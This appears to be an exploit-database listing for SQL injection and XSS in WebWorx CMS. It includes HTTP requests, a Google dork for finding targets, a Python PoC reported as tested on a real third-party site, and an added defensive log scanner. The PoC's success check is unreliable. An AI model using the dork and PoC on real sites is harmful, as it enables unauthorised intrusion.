## https://sploitus.com/exploit?id=PACKETSTORM:190069
# Exploit Title: WebWorx CMS - SQL Injection & Cross-Site Scripting (XSS) Vulnerabilities
    # Date: 2025-03-25
    # Exploit Author: wa0_3/@td9_l
    # Telegram: @wa0_3
    # Vendor Homepage: https://webworx.technology/
    # Version: 1.0
    # Tested on: http://www.native.edu.pk
    # Category: WebApps
    # CVE: N/A
    
    
    ## Vulnerable Endpoint:
    SQLI
    ```
    GET /detail.php?ComCatID=26' HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    ```
    XSS
    ```
    GET /detail.php?ComCatID=25 HTTP/1.1
    Host: localhost
    Accept-Encoding: gzip, deflate, br
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US;q=0.9,en;q=0.8
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
    Connection: close
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="128", "Chromium";v="128"
    Sec-CH-UA-Platform: Windows
    Sec-CH-UA-Mobile: ?0
    Content-Length: 0
    ```

    ## Google Dork:
    ```
    intxt:  Developed by Webworx Technologies
    inurl:detail.php?ComCatID=
    ```

    ## Proof of Concept (PoC):
    ```
    import argparse
    import requests
    
    parser = argparse.ArgumentParser(description='Exploit SQLi & XSS in WebWorx CMS')
    parser.add_argument('-url', help='Target URL (e.g., http://example.com)', required=True)
    parser.add_argument('-payload', help='SQLi or XSS payload', required=True)
    args = parser.parse_args()
    
    url = f"{args.url}/detail.php?ComCatID={args.payload}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
        "Accept-Encoding": "gzip, deflate, br",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "keep-alive"
    }
    
    response = requests.get(url, headers=headers)
    
    # Note: HTTP 200 only shows that the page was returned; it does not by itself confirm the flaw.
    if response.status_code == 200:
        print("[+] Exploit Successful!")
        print("[+] Response:")
        print(response.text)
    else:
        print("[-] Exploit Failed")
    ```
    
    ## Credits:
    Discovered by **wa0_3** (@wa0_3)
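
For defenders reviewing web server logs for the `detail.php?ComCatID=` requests shown above, the following is an added example, not part of the original advisory or of WebWorx code. It assumes `ComCatID` is a numeric category id (as in the advisory's requests, 25 and 26) and flags any value that is not a plain decimal integer; the log lines, client addresses and the function name `find_bad_comcatid` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Mar/2025:10:00:01 +0000] "GET /detail.php?ComCatID=26 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [25/Mar/2025:10:00:07 +0000] "GET /detail.php?ComCatID=26%27 HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.4 - - [25/Mar/2025:10:01:12 +0000] "GET /detail.php?ComCatID=25abc HTTP/1.1" 500 0 "-" "python-requests/2.32"
198.51.100.4 - - [25/Mar/2025:10:01:13 +0000] "GET /detail.php?ComCatID= HTTP/1.1" 200 298 "-" "python-requests/2.32"
203.0.113.5 - - [25/Mar/2025:10:02:40 +0000] "GET /index.php?page=about%27s HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

# Captures client address, request target and status code from a combined-format line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Assumption: ComCatID is a numeric category id, as in the advisory's requests (25, 26).
VALID_ID = re.compile(r"[0-9]{1,10}")


def find_bad_comcatid(log_text):
    """Return (client, decoded_value, status) for each detail.php request
    whose ComCatID is not a plain decimal integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we can parse
        client, target, status = m.groups()
        parts = urlsplit(target)
        if not parts.path.lower().endswith("/detail.php"):
            continue  # only the endpoint named in the advisory
        # parse_qs percent-decodes, so %27 is compared as the character it encodes.
        values = parse_qs(parts.query, keep_blank_values=True).get("ComCatID", [])
        for value in values:
            if not VALID_ID.fullmatch(value):
                findings.append((client, value, int(status)))
    return findings


if __name__ == "__main__":
    for client, value, status in find_bad_comcatid(SAMPLE_LOG):
        print(f"{client} sent ComCatID={value!r} (HTTP {status})")
```

The same allow-list (digits only) is the check the application itself should apply to `ComCatID` before the value reaches a query or the rendered page.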